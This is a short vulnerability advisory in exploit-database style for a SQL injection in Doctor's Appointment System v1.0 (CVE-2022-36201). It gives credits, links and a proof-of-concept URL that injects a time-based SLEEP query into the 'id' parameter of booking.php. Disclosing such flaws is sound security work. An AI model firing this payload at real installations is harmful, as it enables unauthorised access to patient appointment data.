Doctor's Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.
bba8e606cf86fb9a7af0f1c090bad1896d40e1260de7bcb58ab348d6a559cec4# Exploit Title: SQLi - Doctor's Appointment System v1.0
# Google Dork: N/A
# Date: 7/13/2022
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage:
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36201
POC:
http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)